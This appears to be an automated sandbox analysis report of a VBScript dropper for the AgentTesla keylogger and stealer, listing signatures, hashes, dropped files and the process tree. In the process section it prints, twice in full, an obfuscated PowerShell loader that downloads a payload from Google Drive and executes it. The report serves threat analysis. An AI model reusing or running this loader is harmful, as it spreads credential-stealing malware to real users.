Overview

overview

10

Static

static

1

9cec82087a...eb.vbs

windows7-x64

10

9cec82087a...eb.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    10/05/2024, 08:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9cec82087a35cfbb1b0097af9f6113b80cdbcdf9c73383a412dbf8408f37dfeb.vbs

  • Size

    10KB

  • MD5

    420b31e03f0aac291050345120dbb1c8

  • SHA1

    e0968e51e1f6d8f3335ef9b9d5dea2c3f2253079

  • SHA256

    9cec82087a35cfbb1b0097af9f6113b80cdbcdf9c73383a412dbf8408f37dfeb

  • SHA512

    b5d3d8a5fc03ffb54a166b30f4bcdb1073fbdc08df5013b170321199f1939de630f596d058f44a5c4d9bae8f7f3130a6cd3b1d5a11d7f1d9753aee926f0dd7ac

  • SSDEEP

    192:LIOoWa+tZFy6AA+1WHfa1vD7nSruBun2mF:LmW7y6AASOE7nSr0uBF

Score
10/10
agentteslakeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9cec82087a35cfbb1b0097af9f6113b80cdbcdf9c73383a412dbf8408f37dfeb.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Smaabarns = 1;$Cutleriaceous='Su';$Cutleriaceous+='bstrin';$Cutleriaceous+='g';Function Sanktionspolitik($Hematospectrophotometer){$Konsistoriemedlem=$Hematospectrophotometer.Length-$Smaabarns;For($Nedblndinger=1;$Nedblndinger -lt $Konsistoriemedlem;$Nedblndinger+=2){$Afgrnsnings+=$Hematospectrophotometer.$Cutleriaceous.Invoke( $Nedblndinger, $Smaabarns);}$Afgrnsnings;}function Recours($Acuating){& ($Vsentlighedskriteriernes) ($Acuating);}$Sues=Sanktionspolitik 'SM oFzbi lDl a,/V5P.s0 ,(SW i nbdEoSw s ANBTC O1U0 .,0 ;c TW i n 6.4M;, Ox,6T4C;. SrSv : 1R2M1A.T0 )R UGOe cDk oT/B2t0L1s0 0P1.0E1R HF,i rBeOfSoAxn/.1 2H1 .,0, ';$Konomimnstret=Sanktionspolitik 'SU s.e.r.- ADg e n,tH ';$Lugtesans=Sanktionspolitik 'Wh tUtSpDs :U/ /.d rSi,v.e..Rg o o.g l,e . c,oPmS/Bu c,?TeNx p o.rBt =AdpoSw nFlSo.aOd & iAdU=P1SA xNSIgHx,zSnDh O,1AxW7.q U 1Tb 1.bS1PL.3Fe.hGNaULE LPOAPUgJpSL ';$Bloodstones=Sanktionspolitik 'A>C ';$Vsentlighedskriteriernes=Sanktionspolitik 'hiCe xc ';$Pedler='Konferensers206';Recours (Sanktionspolitik 'JS.eItM-WC o n tSe.nVt, ,-.PbaLtGhC GTR:,\EX eLnVoKfMoSb.i s k eV.,tAx.t. P-MVPaQlIuDeS $.PPe,d lVeBrU;R ');Recours (Sanktionspolitik 'Oi fF ,(Bt e s tU-.pTaStWhI ,T :.\SX ePnMo,f.o.bMirsDkTe .,t xltN).{,e x,iAtV} ;S ');$Bogtilrettelgger = Sanktionspolitik ',eUc h.o .%Ka,p.pTd a.t.a %T\RF uBdEg y . SFyFn &A&T eIcDhHo T$. ';Recours (Sanktionspolitik 'd$ gUlFoObmaTlP:CCAa.f,eFt,ePa.t,rEeOs =.(RcFm,dS L/OcS A$TB oSgUt iOl rte tUt e.ltg g.eorS)l ');Recours (Sanktionspolitik 'B$.g,l oMb,aRl,: uTn,c,r.u.sKtmeEdS= $.LNuEg.tOe.sLa,n.s . sRprl.iCt.( $.B.lIo oCdSsBtFoCnSe.s ). ');$Lugtesans=$uncrusted[0];Recours (Sanktionspolitik 'B$ g.l.o b a l,:tF u s o.i.d = N.e,wA- OFbFjSeMcHt. LS.yDsTt eEm,.ANTeDtD.FW eSbGC,lSiPe.n,t ');Recours (Sanktionspolitik 'I$,FRuGs,o.i d . HIeDaEd e r s [,$ K o nNoDmci m.n s.tGrSe t ]M=S$ SUuNe s ');$Cloche=Sanktionspolitik ' FEu sEoli.d . DSoNwPn l.o,aAdBFUi l.e (H$dLPuDg.tBeBs.a n.sF, $DUknStWr aLvIe.l eBdO), ';$Cloche=$Cafeteatres[1]+$Cloche;$Untraveled=$Cafeteatres[0];Recours (Sanktionspolitik 'H$ gDl oPb,a ld:uCIa l i cIu.lCa.tBe.1.7B1M=,( TSeGsDt -BPTaDt hF $ UUn.t r,a.v.eElBe dH) ');while (!$Caliculate171) {Recours (Sanktionspolitik ' $.gBlEoRb a l,:LO p.t.iUcLsT=U$ tSr uFe ') ;Recours $Cloche;Recours (Sanktionspolitik 'VSPtOaIr t -GSKl e eBpO A4 ');Recours (Sanktionspolitik 'B$,g lOoPbVaAlR: CBa,l.iTcRuWl aHt e.1,7 1 =K(cT e sMt - P.aEt hE S$SU.nLt r a vHeSlUeFdF), ') ;Recours (Sanktionspolitik 'F$Rg,lSo b a lS:SC u v,i,e.r iTaTnB=.$,g l,oOb aIlP: A m pUeHrSsMaFnSdSsA1,5L3 +b+,%S$ u n cerhu.s.tOe d .Dc.o uMn.tU ') ;$Lugtesans=$uncrusted[$Cuvierian];}$Equalisations=322933;$Trakkasseres=26388;Recours (Sanktionspolitik 'T$PgClCo bsa lK:LAtf g a nUg s.pPeRrRrDoIn e.r n.e.sH I=f aG.eCt,-AC,o n tbeDnDt S$IU n,t,rGa v.e.l eAd. ');Recours (Sanktionspolitik 'R$BgJlTo b,a.lN: ANn eLcNhTo iDcU1 9O6 =D [NSIyEsKt eOm .,Cao,nMv e r t ] :S: FKr o.mSBUa s e 6,4.S tTrUi nMgS(O$AA fMg a,n gMssp eSrSr o nAeFrNn,eBs )F ');Recours (Sanktionspolitik ',$ gBl oEbRaSlE: F o.l kNe p.e n.s itohn sRaAl d,e r,eVnBsU M=T .[sS.yNsGt eOm,.,T.e x.tT.BE n.c o.dFi,n gR]R:T: A S C,I,I . G eAt S t r i,nIg,(.$ ABn e c h.osiMc,1 9.6,)d ');Recours (Sanktionspolitik 'F$ g lPorb a.lS:kGceCnGo pSlDi,v n iAn g.e rIn e =R$PF.oHlFk e.p eUnBs i.o n,s.aFl dTeOr eCn sU.Rs.u.b s tRr.i,n gU(R$ EAq,u a.lFiTs,aTt iUoSn s,,.$STPr a,kTkDaDs sSe,rPe sF), ');Recours $Genoplivningerne;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2984
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fudgy.Syn && echo $"
        3⤵
          PID:2440
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Smaabarns = 1;$Cutleriaceous='Su';$Cutleriaceous+='bstrin';$Cutleriaceous+='g';Function Sanktionspolitik($Hematospectrophotometer){$Konsistoriemedlem=$Hematospectrophotometer.Length-$Smaabarns;For($Nedblndinger=1;$Nedblndinger -lt $Konsistoriemedlem;$Nedblndinger+=2){$Afgrnsnings+=$Hematospectrophotometer.$Cutleriaceous.Invoke( $Nedblndinger, $Smaabarns);}$Afgrnsnings;}function Recours($Acuating){& ($Vsentlighedskriteriernes) ($Acuating);}$Sues=Sanktionspolitik 'SM oFzbi lDl a,/V5P.s0 ,(SW i nbdEoSw s ANBTC O1U0 .,0 ;c TW i n 6.4M;, Ox,6T4C;. SrSv : 1R2M1A.T0 )R UGOe cDk oT/B2t0L1s0 0P1.0E1R HF,i rBeOfSoAxn/.1 2H1 .,0, ';$Konomimnstret=Sanktionspolitik 'SU s.e.r.- ADg e n,tH ';$Lugtesans=Sanktionspolitik 'Wh tUtSpDs :U/ /.d rSi,v.e..Rg o o.g l,e . c,oPmS/Bu c,?TeNx p o.rBt =AdpoSw nFlSo.aOd & iAdU=P1SA xNSIgHx,zSnDh O,1AxW7.q U 1Tb 1.bS1PL.3Fe.hGNaULE LPOAPUgJpSL ';$Bloodstones=Sanktionspolitik 'A>C ';$Vsentlighedskriteriernes=Sanktionspolitik 'hiCe xc ';$Pedler='Konferensers206';Recours (Sanktionspolitik 'JS.eItM-WC o n tSe.nVt, ,-.PbaLtGhC GTR:,\EX eLnVoKfMoSb.i s k eV.,tAx.t. P-MVPaQlIuDeS $.PPe,d lVeBrU;R ');Recours (Sanktionspolitik 'Oi fF ,(Bt e s tU-.pTaStWhI ,T :.\SX ePnMo,f.o.bMirsDkTe .,t xltN).{,e x,iAtV} ;S ');$Bogtilrettelgger = Sanktionspolitik ',eUc h.o .%Ka,p.pTd a.t.a %T\RF uBdEg y . SFyFn &A&T eIcDhHo T$. ';Recours (Sanktionspolitik 'd$ gUlFoObmaTlP:CCAa.f,eFt,ePa.t,rEeOs =.(RcFm,dS L/OcS A$TB oSgUt iOl rte tUt e.ltg g.eorS)l ');Recours (Sanktionspolitik 'B$.g,l oMb,aRl,: uTn,c,r.u.sKtmeEdS= $.LNuEg.tOe.sLa,n.s . sRprl.iCt.( $.B.lIo oCdSsBtFoCnSe.s ). ');$Lugtesans=$uncrusted[0];Recours (Sanktionspolitik 'B$ g.l.o b a l,:tF u s o.i.d = N.e,wA- OFbFjSeMcHt. LS.yDsTt eEm,.ANTeDtD.FW eSbGC,lSiPe.n,t ');Recours (Sanktionspolitik 'I$,FRuGs,o.i d . HIeDaEd e r s [,$ K o nNoDmci m.n s.tGrSe t ]M=S$ SUuNe s ');$Cloche=Sanktionspolitik ' FEu sEoli.d . DSoNwPn l.o,aAdBFUi l.e (H$dLPuDg.tBeBs.a n.sF, $DUknStWr aLvIe.l eBdO), ';$Cloche=$Cafeteatres[1]+$Cloche;$Untraveled=$Cafeteatres[0];Recours (Sanktionspolitik 'H$ gDl oPb,a ld:uCIa l i cIu.lCa.tBe.1.7B1M=,( TSeGsDt -BPTaDt hF $ UUn.t r,a.v.eElBe dH) ');while (!$Caliculate171) {Recours (Sanktionspolitik ' $.gBlEoRb a l,:LO p.t.iUcLsT=U$ tSr uFe ') ;Recours $Cloche;Recours (Sanktionspolitik 'VSPtOaIr t -GSKl e eBpO A4 ');Recours (Sanktionspolitik 'B$,g lOoPbVaAlR: CBa,l.iTcRuWl aHt e.1,7 1 =K(cT e sMt - P.aEt hE S$SU.nLt r a vHeSlUeFdF), ') ;Recours (Sanktionspolitik 'F$Rg,lSo b a lS:SC u v,i,e.r iTaTnB=.$,g l,oOb aIlP: A m pUeHrSsMaFnSdSsA1,5L3 +b+,%S$ u n cerhu.s.tOe d .Dc.o uMn.tU ') ;$Lugtesans=$uncrusted[$Cuvierian];}$Equalisations=322933;$Trakkasseres=26388;Recours (Sanktionspolitik 'T$PgClCo bsa lK:LAtf g a nUg s.pPeRrRrDoIn e.r n.e.sH I=f aG.eCt,-AC,o n tbeDnDt S$IU n,t,rGa v.e.l eAd. ');Recours (Sanktionspolitik 'R$BgJlTo b,a.lN: ANn eLcNhTo iDcU1 9O6 =D [NSIyEsKt eOm .,Cao,nMv e r t ] :S: FKr o.mSBUa s e 6,4.S tTrUi nMgS(O$AA fMg a,n gMssp eSrSr o nAeFrNn,eBs )F ');Recours (Sanktionspolitik ',$ gBl oEbRaSlE: F o.l kNe p.e n.s itohn sRaAl d,e r,eVnBsU M=T .[sS.yNsGt eOm,.,T.e x.tT.BE n.c o.dFi,n gR]R:T: A S C,I,I . G eAt S t r i,nIg,(.$ ABn e c h.osiMc,1 9.6,)d ');Recours (Sanktionspolitik 'F$ g lPorb a.lS:kGceCnGo pSlDi,v n iAn g.e rIn e =R$PF.oHlFk e.p eUnBs i.o n,s.aFl dTeOr eCn sU.Rs.u.b s tRr.i,n gU(R$ EAq,u a.lFiTs,aTt iUoSn s,,.$STPr a,kTkDaDs sSe,rPe sF), ');Recours $Genoplivningerne;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1672
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fudgy.Syn && echo $"
            4⤵
              PID:2668
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2208

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\CabE003.tmp
        Filesize

        65KB

        MD5

        ac05d27423a85adc1622c714f2cb6184

        SHA1

        b0fe2b1abddb97837ea0195be70ab2ff14d43198

        SHA256

        c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

        SHA512

        6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Fudgy.Syn
        Filesize

        454KB

        MD5

        fc62b80e164b7026eac50c83ad55770e

        SHA1

        0cd849e2fa77e57d94ebe8c5b7685474e2438e48

        SHA256

        473ff96f43544f04cb08a9e6faa4a72162ebd8e93363cb82cdd914f34eb38f1c

        SHA512

        924b368df010aecca6d7efb572ab0a8d7a5afaacb3c12b94877f0606efe113184180fdf47067d00004f49297c3978054abc0980b51c04b8e145d9e276041c8de

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LCXMZGY2388JJPZYGBAU.temp
        Filesize

        7KB

        MD5

        6c46c14adf8b8d80199fa256656fc23f

        SHA1

        d0a24dadd042739984c3ae8426d06e90dbf56157

        SHA256

        86466c333d85fe3d3b6dc9fc2abd9fdcc3c401ed21ea28a0a7004dd4f4532006

        SHA512

        cda2ed0925191945bbd79033605bcadc36197cff04e8356e20f6f69dcc803a0b3fcf3f303caefb29cb2e55cf73176edc19aeb34364a800826bbc4908234943b4

        Download Submit

      • memory/1672-26-0x00000000065E0000-0x0000000008374000-memory.dmp

        Filesize

        29.6MB

        Download

      • memory/2208-49-0x0000000000400000-0x0000000001462000-memory.dmp

        Filesize

        16.4MB

        Download

      • memory/2208-51-0x0000000000400000-0x0000000000442000-memory.dmp

        Filesize

        264KB

        Download

      • memory/2984-24-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2984-18-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2984-15-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2984-12-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2984-14-0x0000000001E60000-0x0000000001E68000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2984-25-0x000007FEF538E000-0x000007FEF538F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2984-11-0x000007FEF538E000-0x000007FEF538F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2984-13-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2984-17-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2984-50-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2984-16-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

        Filesize

        9.6MB

        Download